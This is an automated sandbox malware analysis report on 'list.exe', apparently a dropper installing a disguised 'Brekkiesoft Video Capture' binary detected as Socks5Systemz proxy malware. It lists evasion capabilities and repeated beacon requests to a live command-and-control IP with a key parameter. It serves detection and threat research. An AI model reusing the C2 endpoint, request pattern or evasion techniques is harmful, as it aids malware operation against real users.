Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
list.exe

Overview

General Information

Sample name:list.exe
Analysis ID:1577465
MD5:8eabea9b74251fe67f24b87e54486643
SHA1:b8549e3abe3828be7164e507414658df238c2652
SHA256:ec252c14b60754a9e280e0e4624077fcc3af03347f1a585b539f8d100777ad22
Tags:bulletproofexeSocks5Systemzuser-abus3reports
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • list.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\list.exe" MD5: 8EABEA9B74251FE67F24B87E54486643)
    • list.tmp (PID: 7352 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" MD5: 048F12CF9C44FE7D997B30F23A9A2228)
      • bsoftvideocapture33.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i MD5: A5B9D0E5F04BC3D01C9E97A61F27EB8F)
  • svchost.exe (PID: 7380 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7432 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7488 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7548 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7600 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 720 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: bsoftvideocapture33.exe PID: 7528JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  6.0.bsoftvideocapture33.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, ParentCommandLine: "C:\Users\user\Desktop\list.exe", ParentImage: C:\Users\user\Desktop\list.exe, ParentProcessId: 7296, ParentProcessName: list.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" , ProcessId: 7352, ProcessName: list.tmp
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7380, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:00:02.379653+010020287653Unknown Traffic192.168.2.749795188.119.66.185443TCP
                    2024-12-18T14:00:05.316086+010020287653Unknown Traffic192.168.2.749804188.119.66.185443TCP
                    2024-12-18T14:00:08.584340+010020287653Unknown Traffic192.168.2.749813188.119.66.185443TCP
                    2024-12-18T14:00:11.311309+010020287653Unknown Traffic192.168.2.749819188.119.66.185443TCP
                    2024-12-18T14:00:13.882631+010020287653Unknown Traffic192.168.2.749824188.119.66.185443TCP
                    2024-12-18T14:00:16.573601+010020287653Unknown Traffic192.168.2.749832188.119.66.185443TCP
                    2024-12-18T14:00:19.325465+010020287653Unknown Traffic192.168.2.749838188.119.66.185443TCP
                    2024-12-18T14:00:21.766157+010020287653Unknown Traffic192.168.2.749843188.119.66.185443TCP
                    2024-12-18T14:00:24.333991+010020287653Unknown Traffic192.168.2.749848188.119.66.185443TCP
                    2024-12-18T14:00:26.975544+010020287653Unknown Traffic192.168.2.749853188.119.66.185443TCP
                    2024-12-18T14:00:29.909378+010020287653Unknown Traffic192.168.2.749860188.119.66.185443TCP
                    2024-12-18T14:00:32.931169+010020287653Unknown Traffic192.168.2.749868188.119.66.185443TCP
                    2024-12-18T14:00:35.935185+010020287653Unknown Traffic192.168.2.749875188.119.66.185443TCP
                    2024-12-18T14:00:38.547635+010020287653Unknown Traffic192.168.2.749885188.119.66.185443TCP
                    2024-12-18T14:00:40.992337+010020287653Unknown Traffic192.168.2.749891188.119.66.185443TCP
                    2024-12-18T14:00:43.262705+010020287653Unknown Traffic192.168.2.749897188.119.66.185443TCP
                    2024-12-18T14:00:45.771653+010020287653Unknown Traffic192.168.2.749903188.119.66.185443TCP
                    2024-12-18T14:00:48.542708+010020287653Unknown Traffic192.168.2.749909188.119.66.185443TCP
                    2024-12-18T14:00:51.173700+010020287653Unknown Traffic192.168.2.749915188.119.66.185443TCP
                    2024-12-18T14:00:53.662666+010020287653Unknown Traffic192.168.2.749922188.119.66.185443TCP
                    2024-12-18T14:00:56.041453+010020287653Unknown Traffic192.168.2.749928188.119.66.185443TCP
                    2024-12-18T14:00:58.823131+010020287653Unknown Traffic192.168.2.749934188.119.66.185443TCP
                    2024-12-18T14:01:01.592108+010020287653Unknown Traffic192.168.2.749944188.119.66.185443TCP
                    2024-12-18T14:01:04.322674+010020287653Unknown Traffic192.168.2.749950188.119.66.185443TCP
                    2024-12-18T14:01:07.308660+010020287653Unknown Traffic192.168.2.749956188.119.66.185443TCP
                    2024-12-18T14:01:10.190420+010020287653Unknown Traffic192.168.2.749967188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:00:03.416230+010028032742Potentially Bad Traffic192.168.2.749795188.119.66.185443TCP
                    2024-12-18T14:00:06.413497+010028032742Potentially Bad Traffic192.168.2.749804188.119.66.185443TCP
                    2024-12-18T14:00:09.530883+010028032742Potentially Bad Traffic192.168.2.749813188.119.66.185443TCP
                    2024-12-18T14:00:11.997868+010028032742Potentially Bad Traffic192.168.2.749819188.119.66.185443TCP
                    2024-12-18T14:00:14.654720+010028032742Potentially Bad Traffic192.168.2.749824188.119.66.185443TCP
                    2024-12-18T14:00:17.561270+010028032742Potentially Bad Traffic192.168.2.749832188.119.66.185443TCP
                    2024-12-18T14:00:20.002065+010028032742Potentially Bad Traffic192.168.2.749838188.119.66.185443TCP
                    2024-12-18T14:00:22.466431+010028032742Potentially Bad Traffic192.168.2.749843188.119.66.185443TCP
                    2024-12-18T14:00:25.371903+010028032742Potentially Bad Traffic192.168.2.749848188.119.66.185443TCP
                    2024-12-18T14:00:27.925819+010028032742Potentially Bad Traffic192.168.2.749853188.119.66.185443TCP
                    2024-12-18T14:00:30.743519+010028032742Potentially Bad Traffic192.168.2.749860188.119.66.185443TCP
                    2024-12-18T14:00:34.040700+010028032742Potentially Bad Traffic192.168.2.749868188.119.66.185443TCP
                    2024-12-18T14:00:36.956646+010028032742Potentially Bad Traffic192.168.2.749875188.119.66.185443TCP
                    2024-12-18T14:00:39.269197+010028032742Potentially Bad Traffic192.168.2.749885188.119.66.185443TCP
                    2024-12-18T14:00:41.670874+010028032742Potentially Bad Traffic192.168.2.749891188.119.66.185443TCP
                    2024-12-18T14:00:44.007513+010028032742Potentially Bad Traffic192.168.2.749897188.119.66.185443TCP
                    2024-12-18T14:00:46.503947+010028032742Potentially Bad Traffic192.168.2.749903188.119.66.185443TCP
                    2024-12-18T14:00:49.475698+010028032742Potentially Bad Traffic192.168.2.749909188.119.66.185443TCP
                    2024-12-18T14:00:52.086221+010028032742Potentially Bad Traffic192.168.2.749915188.119.66.185443TCP
                    2024-12-18T14:00:54.349196+010028032742Potentially Bad Traffic192.168.2.749922188.119.66.185443TCP
                    2024-12-18T14:00:56.735721+010028032742Potentially Bad Traffic192.168.2.749928188.119.66.185443TCP
                    2024-12-18T14:00:59.849002+010028032742Potentially Bad Traffic192.168.2.749934188.119.66.185443TCP
                    2024-12-18T14:01:02.555588+010028032742Potentially Bad Traffic192.168.2.749944188.119.66.185443TCP
                    2024-12-18T14:01:05.207393+010028032742Potentially Bad Traffic192.168.2.749950188.119.66.185443TCP
                    2024-12-18T14:01:08.431803+010028032742Potentially Bad Traffic192.168.2.749956188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308aAvira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325Avira URL Cloud: Label: malware
                    Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exeReversingLabs: Detection: 37%
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeReversingLabs: Detection: 37%
                    Source: list.exeReversingLabs: Detection: 47%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045D254 ArcFourCrypt,2_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045D23C ArcFourCrypt,2_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_10001130 ArcFourCrypt,2_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeUnpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack
                    Source: list.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Brekkiesoft Video Capture_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5FBME.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-0G4JQ.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-B9LPS.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5FBME.tmp.2.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49795 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49804 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49813 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49819 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49824 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49832 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49843 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49853 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49860 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49848 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49885 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49891 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49903 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49868 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49897 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49875 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49922 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49915 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49909 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49928 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49934 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49944 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49950 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49956 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49967 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49813 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49804 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49853 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49843 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49819 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49860 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49832 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49795 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49868 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49848 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49885 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49903 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49875 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49824 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49891 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49950 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49934 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49956 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49928 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49922 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49897 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49944 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49909 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49915 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
